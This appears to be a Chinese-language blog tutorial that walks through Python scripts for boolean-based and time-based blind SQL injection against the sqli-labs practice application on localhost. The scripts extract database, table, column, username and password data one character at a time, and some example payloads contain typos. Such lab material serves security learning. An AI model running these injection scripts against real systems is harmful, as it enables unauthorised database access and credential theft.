sql盲注脚本

sql盲注脚本

十一月 23, 2021

python写sql注入脚本

在布尔盲注和时间盲注需要一个一个试的时候就需要使用python脚本

布尔盲注

以sqlilab第8关为例

![pictuer](D:.\picture\屏幕截图 2021-10-25 122458.png)

查询成功就会返回you are in查询不成功就不返回,

![picture](D:\p\picture\屏幕截图 2021-10-25 161517.png)

可用这个特性猜测 playload annd ascii(substr(select group_concat(table_name) from information_schema.tables where table_schema=database()))=123

判断表名得第一个字母的asc码值

由此一个一个推断就可以得到完整的表名

但手工写太累了这时候就需要写python脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
import requests#引入requests库
s = requests.session()#创建session对象用来发送请求
url = "http://localhost/sqli-labs-master/Less-8/?id=1'"


def o(g):
    global s
    for i in range(1, 100):
        u = str(i)
        dtlenth = g + u + '--+'#Playload的构建
        if 'You are in...........' in s.get(url + dtlenth).text:#发送playload并判断是否成功
            f=i
            print('databaselenth:' + str(f))#成功就输出值
            break
    return f


def no(k, i):
    lib=''
    for x in range(1, i+1):
            for n in range(1, 400):
                b = str(n)
                dataname = k + str(x) + ",1))=" + b + "--+"

                if "You are in..........." in s.get(url + dataname).text:
                    lib = lib + chr(n)
                    print("database:" + lib)
                    break
    return lib
# leng=o('and length(database())=')
# dbname=no("and ascii(substr(database(),", leng)
#tablename=no("and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()), ",30)
#columnname=no("and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users'),", 100)
#password=no("and ascii(substr((select group_concat(password) from users),", 200)
name=no("and ascii(substr((select group_concat(username) from users),", 200)

![](D:\p\picture\屏幕截图 2021-10-25 165010.png)

得到了数据

时间盲注

以sqlilab第9关为例无论输入什么都只会显示you are in,那就要用到时间盲注,sleep函数会让网页的响应延迟自定义的秒数,写python脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import requests
import time
import datetime
s = requests.session()
url = 'http://localhost/sqli-labs-master/Less-10/?id=1"'

def o(g):
    global s
    for i in range(1, 100):
        u = str(i)
        dtlenth = g + u + '--+'
        if 'You are in...........' in s.get(url + dtlenth).text:
            f=i
            print('databaselenth:' + str(f))
            break
    return f


def no(k, i):
    lib=''
    for x in range(1, i+1):
            for n in range(1, 400):
                b = str(n)
                dataname = k + str(x) + ",1))=" + b + ",sleep(5),1)--+"
                Starttime=time.time()#记录下当前的时间戳
                response1 = requests.get(url+dataname)#获取网页回应

                if time.time() - Starttime > 5:#获取网页回应需要的时间
                    lib = lib + chr(n)
                    print("database:" + lib)
                    break
    return lib
j=no("and if(ascii(substr((select group_concat(username) from users),", 200)#if判断if(a,b,c)若a为真输出b,假输出c

![](D:\p\picture\屏幕截图 2021-10-25 171419.png)

得到结果